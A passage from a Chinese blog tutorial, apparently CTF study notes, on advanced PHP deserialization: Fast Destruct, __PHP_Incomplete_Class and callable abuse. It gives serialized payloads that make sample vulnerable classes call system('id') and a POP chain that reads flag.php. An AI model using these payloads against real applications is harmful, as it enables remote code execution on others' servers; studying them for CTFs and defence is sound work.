<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;Evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:2:&quot;id&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>反序列化后，代码会执行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$obj</span>-&gt;cmd = <span class="hljs-string">&#x27;whoami&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>最后析构时执行的可能是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">whoami<br></code></pre></td></tr></table></figure>

<p>而不是我们原来设置的 <code>id</code>。</p>
<p>使用 Fast Destruct：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">a:2:&#123;i:0;O:4:&quot;Evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:2:&quot;id&quot;;&#125;i:0;N;&#125;<br></code></pre></td></tr></table></figure>

<p><code>Evil::__destruct()</code> 会在后续赋值前触发。</p>
<p>于是后面的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$obj</span>-&gt;cmd = <span class="hljs-string">&#x27;whoami&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>已经影响不到那个被提前销毁的对象。</p>
<h3 id="2-5-与-PHP-Incomplete-Class的关系"><a href="#2-5-与-PHP-Incomplete-Class的关系" class="headerlink" title="2.5 与__PHP_Incomplete_Class的关系"></a>2.5 与__PHP_Incomplete_Class的关系</h3><p>Fast Destruct 和 <code>__PHP_Incomplete_Class</code> 是两个不同技巧。</p>
<p>不完整类解决的是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">类不存在时，如何通过 serialize(unserialize($x)) 这类稳定性检查<br></code></pre></td></tr></table></figure>

<p>Fast Destruct 解决的是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">对象已经能被实例化时，如何让 __destruct() 尽快执行<br></code></pre></td></tr></table></figure>

<p>注意：如果反序列化时目标类不存在，得到的是 <code>__PHP_Incomplete_Class</code>，不会触发目标类的 <code>__destruct()</code>。</p>
<p>也就是说：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">类不存在阶段：适合用不完整类过检查<br>类存在阶段：适合用 Fast Destruct 提前触发析构<br></code></pre></td></tr></table></figure>

<h3 id="2-6-注意点"><a href="#2-6-注意点" class="headerlink" title="2.6 注意点"></a>2.6 注意点</h3><p>Fast Destruct 常见 payload 是数组：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">a:2:&#123;...&#125;<br></code></pre></td></tr></table></figure>

<p>所以 <code>unserialize()</code> 的返回值通常不是目标对象，而是数组。</p>
<p>如果题目后面强制要求：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (!<span class="hljs-variable">$obj</span> <span class="hljs-keyword">instanceof</span> Evil) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;no&#x27;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>那么这种 Fast Destruct 形式可能过不了。</p>
<p>另外，如果题目前面有严格检查：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>)) == <span class="hljs-variable">$x</span><br></code></pre></td></tr></table></figure>

<p>Fast Destruct payload 不一定能通过。</p>
<p>因为对象被重复键覆盖后，最终数组可能只剩下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">a:1:&#123;i:0;N;&#125;<br></code></pre></td></tr></table></figure>

<p>这和原 payload 不一致。</p>
<p>所以实际做题时要分清：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">稳定性检查阶段：优先考虑不完整类<br>最终触发阶段：再考虑 Fast Destruct<br></code></pre></td></tr></table></figure>

<h2 id="3-Callable"><a href="#3-Callable" class="headerlink" title="3. Callable"></a>3. Callable</h2><h3 id="3-1-它是什么"><a href="#3-1-它是什么" class="headerlink" title="3.1 它是什么"></a>3.1 它是什么</h3><p><code>callable</code> 在 PHP 中表示“可调用的东西”。</p>
<p>简单说：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">只要一个值能被 PHP 当成函数或方法调用，它就是 callable<br></code></pre></td></tr></table></figure>

<p>常见 callable 形式包括：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-string">&#x27;phpinfo&#x27;</span>              <span class="hljs-comment">// 普通函数名</span><br><span class="hljs-string">&#x27;system&#x27;</span>               <span class="hljs-comment">// 普通函数名</span><br>[<span class="hljs-variable">$obj</span>, <span class="hljs-string">&#x27;method&#x27;</span>]        <span class="hljs-comment">// 对象方法</span><br>[<span class="hljs-string">&#x27;ClassName&#x27;</span>, <span class="hljs-string">&#x27;method&#x27;</span>] <span class="hljs-comment">// 静态方法</span><br><span class="hljs-string">&#x27;ClassName::method&#x27;</span>     <span class="hljs-comment">// 静态方法字符串</span><br><span class="hljs-variable">$closure</span>                <span class="hljs-comment">// 匿名函数</span><br><span class="hljs-variable">$objectWithInvoke</span>       <span class="hljs-comment">// 实现 __invoke() 的对象</span><br></code></pre></td></tr></table></figure>

<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$func</span> = <span class="hljs-string">&#x27;phpinfo&#x27;</span>;<br><span class="hljs-variable">$func</span>();<br></code></pre></td></tr></table></figure>

<p>等价于：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">phpinfo</span>();<br></code></pre></td></tr></table></figure>

<p>如果：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$func</span> = <span class="hljs-string">&#x27;system&#x27;</span>;<br><span class="hljs-variable">$func</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>等价于：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<h3 id="3-2-call-user-func"><a href="#3-2-call-user-func" class="headerlink" title="3.2 call_user_func()"></a>3.2 <code>call_user_func()</code></h3><p><code>call_user_func()</code> 用于调用一个回调函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$callback</span>, <span class="hljs-variable">$arg1</span>, <span class="hljs-variable">$arg2</span>);<br></code></pre></td></tr></table></figure>

<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-string">&#x27;var_dump&#x27;</span>, <span class="hljs-string">&#x27;hello&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>等价于：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-string">&#x27;hello&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>如果是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-string">&#x27;system&#x27;</span>, <span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>就等价于：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>所以在反序列化题里看到：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span>-&gt;func, <span class="hljs-variable">$this</span>-&gt;arg);<br></code></pre></td></tr></table></figure>

<p>就要立刻看：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">$this-&gt;func 能不能控制成 system<br>$this-&gt;arg 能不能控制成参数<br></code></pre></td></tr></table></figure>

<h3 id="3-3-call-user-func-array"><a href="#3-3-call-user-func-array" class="headerlink" title="3.3 call_user_func_array()"></a>3.3 <code>call_user_func_array()</code></h3><p><code>call_user_func_array()</code> 和 <code>call_user_func()</code> 类似，只是参数用数组传。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func_array</span>(<span class="hljs-variable">$callback</span>, <span class="hljs-variable">$args</span>);<br></code></pre></td></tr></table></figure>

<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">call_user_func_array</span>(<span class="hljs-string">&#x27;system&#x27;</span>, [<span class="hljs-string">&#x27;id&#x27;</span>]);<br></code></pre></td></tr></table></figure>

<p>等价于：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>典型题目：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Task</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$callback</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$args</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-title function_ invoke__">call_user_func_array</span>(<span class="hljs-variable">$this</span>-&gt;callback, <span class="hljs-variable">$this</span>-&gt;args);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;Task&quot;:2:&#123;s:8:&quot;callback&quot;;s:6:&quot;system&quot;;s:4:&quot;args&quot;;a:1:&#123;i:0;s:2:&quot;id&quot;;&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>执行效果：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<h3 id="3-4-is-callable-不是安全过滤"><a href="#3-4-is-callable-不是安全过滤" class="headerlink" title="3.4 is_callable() 不是安全过滤"></a>3.4 <code>is_callable()</code> 不是安全过滤</h3><p><code>is_callable()</code> 用来判断一个值能否被调用。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">is_callable</span>(<span class="hljs-string">&#x27;phpinfo&#x27;</span>); <span class="hljs-comment">// true</span><br><span class="hljs-title function_ invoke__">is_callable</span>(<span class="hljs-string">&#x27;system&#x27;</span>);  <span class="hljs-comment">// true</span><br></code></pre></td></tr></table></figure>

<p>很多题目会写：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_callable</span>(<span class="hljs-variable">$this</span>-&gt;func)) &#123;<br>    <span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span>-&gt;func, <span class="hljs-variable">$this</span>-&gt;arg);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这不是安全限制。</p>
<p>如果攻击者能控制：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable language_">$this</span>-&gt;func = <span class="hljs-string">&#x27;system&#x27;</span>;<br><span class="hljs-variable language_">$this</span>-&gt;arg = <span class="hljs-string">&#x27;id&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>那么：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">is_callable</span>(<span class="hljs-string">&#x27;system&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>返回 <code>true</code>，后面仍然会调用：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure>

<h3 id="3-5-invoke-与-callable"><a href="#3-5-invoke-与-callable" class="headerlink" title="3.5 __invoke() 与 callable&gt; "></a>3.5 <code>__invoke()</code> 与 <code>callable&gt; </code></h3><p>如果一个类定义了 <code>__invoke()</code>，它的对象本身就可以被当成函数调用。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Demo</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;invoke&#x27;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Demo</span>();<br><span class="hljs-variable">$obj</span>();<br></code></pre></td></tr></table></figure>

<p>执行结果：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">invoke<br></code></pre></td></tr></table></figure>

<p>所以看到这种代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">(<span class="hljs-variable language_">$this</span>-&gt;callback)();<br></code></pre></td></tr></table></figure>

<p>就要想到：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">$this-&gt;callback 可以是一个实现了 __invoke() 的对象<br></code></pre></td></tr></table></figure>

<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Start</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$callback</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        (<span class="hljs-variable language_">$this</span>-&gt;callback)();<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">End</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;flag.php&#x27;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>利用链：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs text">Start::__destruct()<br>  -&gt; ($this-&gt;callback)()<br>  -&gt; End::__invoke()<br>  -&gt; 读取 flag<br></code></pre></td></tr></table></figure>

<h3 id="3-6-例题"><a href="#3-6-例题" class="headerlink" title="3.6 例题"></a>3.6 例题</h3><p>题目代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">User</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$callback</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$arg</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_callable</span>(<span class="hljs-variable">$this</span>-&gt;callback)) &#123;<br>            <span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$this</span>-&gt;callback, <span class="hljs-variable">$this</span>-&gt;arg);<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;data&#x27;</span>]);<br></code></pre></td></tr></table></figure>

<p>分析：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs text">unserialize($_GET[&#x27;data&#x27;]) 用户可控<br>User::__destruct() 请求结束自动触发<br>$callback 和 $arg 都是 public 属性，可以通过 payload 控制<br>is_callable(&#x27;system&#x27;) 返回 true<br>call_user_func(&#x27;system&#x27;, &#x27;id&#x27;) 可以被调用<br></code></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;User&quot;:2:&#123;s:8:&quot;callback&quot;;s:6:&quot;system&quot;;s:3:&quot;arg&quot;;s:2:&quot;id&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>执行链：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs text">unserialize()<br>  -&gt; 生成 User 对象<br>  -&gt; 请求结束触发 User::__destruct()<br>  -&gt; is_callable(&#x27;system&#x27;) 为 true<br>  -&gt; call_user_func(&#x27;system&#x27;, &#x27;id&#x27;)<br></code></pre></td></tr></table></figure>

<h2 id="4-三个技巧如何组合理解"><a href="#4-三个技巧如何组合理解" class="headerlink" title="4. 三个技巧如何组合理解"></a>4. 三个技巧如何组合理解</h2><p>这三个技巧解决的是不同问题。</p>
<table>
<thead>
<tr>
<th>技巧</th>
<th>解决的问题</th>
<th>常见位置</th>
</tr>
</thead>
<tbody><tr>
<td>不完整类</td>
<td>类不存在时如何通过检查</td>
<td><code>serialize(unserialize($x))</code></td>
</tr>
<tr>
<td>Fast Destruct</td>
<td>如何提前触发析构</td>
<td>数组重复键覆盖</td>
</tr>
<tr>
<td>Callable</td>
<td>如何把可控属性变成函数调用</td>
<td><code>call_user_func()</code>、<code>($x)()</code></td>
</tr>
</tbody></table>
<p>可以用一条链路理解它们：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs text">第一阶段：<br>目标类还没加载<br>  -&gt; 用 __PHP_Incomplete_Class 通过 serialize(unserialize($x)) 检查<br><br>第二阶段：<br>目标类已经加载<br>  -&gt; 反序列化出真实对象<br>  -&gt; 如果需要提前触发析构，用 Fast Destruct<br><br>触发阶段：<br>__destruct()、__invoke() 或其他方法中出现 callable<br>  -&gt; 控制 callback 和参数<br>  -&gt; 调用目标函数或目标方法<br></code></pre></td></tr></table></figure>

<p>注意它们不是固定一起用的。</p>
<p>有些题只考不完整类，有些题只考 Fast Destruct，有些题只考 callable。真正做题时，要先看源码的数据流和类加载顺序。</p>
<h2 id="5-解题思路"><a href="#5-解题思路" class="headerlink" title="5. 解题思路"></a>5. 解题思路</h2><p>看到 PHP 反序列化题时，可以按下面顺序看。</p>
<ol>
<li>有没有 <code>unserialize()</code>，参数是否可控。</li>
<li>有没有 <code>serialize(unserialize($x))</code> 这种稳定性检查。</li>
<li>检查阶段目标类是否已经定义。</li>
<li>检查后是否又定义类、加载文件、再次 <code>unserialize()</code>。</li>
<li>利用点是否在 <code>__destruct()</code>。</li>
<li>是否需要 Fast Destruct 抢在后续逻辑之前触发。</li>
<li>代码中有没有 <code>call_user_func()</code>、<code>call_user_func_array()</code>、<code>($x)()</code>、<code>is_callable()</code>。</li>
<li>callable 的函数名、对象、方法名、参数是否能通过属性控制。</li>
<li>如果是 private 或 protected 属性，注意序列化属性名格式。</li>
<li>如果 payload 要通过稳定性检查，注意字符串长度、属性数量和尾部数据必须标准。</li>
</ol>
<h2 id="6-总结"><a href="#6-总结" class="headerlink" title="6. 总结"></a>6. 总结</h2><p><code>__PHP_Incomplete_Class</code> 的关键是“类不存在但信息还在”。它适合绕过 <code>serialize(unserialize($x)) != $x</code> 这类稳定性检查，因为不完整类再序列化后可能恢复原始对象字符串。</p>
<p>Fast Destruct 的关键是“对象失去引用就析构”。它通过数组重复键覆盖等方式，让 <code>__destruct()</code> 提前触发，常用于抢在后续检查、属性修改或流程中断之前执行利用逻辑。</p>
<p>Callable 的关键是“可控属性被当成函数或方法调用”。如果 <code>callback</code> 和参数都能被反序列化控制，<code>call_user_func()</code>、<code>call_user_func_array()</code>、<code>($x)()</code> 这类代码就可能成为 POP 链中的关键跳板。</p>
<p>一句话串起来：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">不完整类负责过检查，Fast Destruct 负责抢时机，Callable 负责把属性变成调用。<br></code></pre></td></tr></table></figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web%E5%AD%A6%E4%B9%A0/" class="category-chain-item">web学习</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>反序列化进阶</div>
      <div>https://kivvs.github.io/2026/08/14/反序列化进阶/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>kivvs</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年8月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/08/14/SQL-quine%E6%B3%A8%E5%85%A5/" title="SQL quine注入">
                        <span class="hidden-mobile">SQL quine注入</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
        var options = {"repo":"kivvs/kivvs.github.io","repo-id":"R_kgDOT3J6Jg","category":"Announcements","category-id":"DIC_kwDOT3J6Js4DDSMc","theme-light":"light","theme-dark":"dark","mapping":"pathname","reactions-enabled":1,"emit-metadata":0,"input-position":"top","lang":"zh-CN"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'dark';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid- /hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
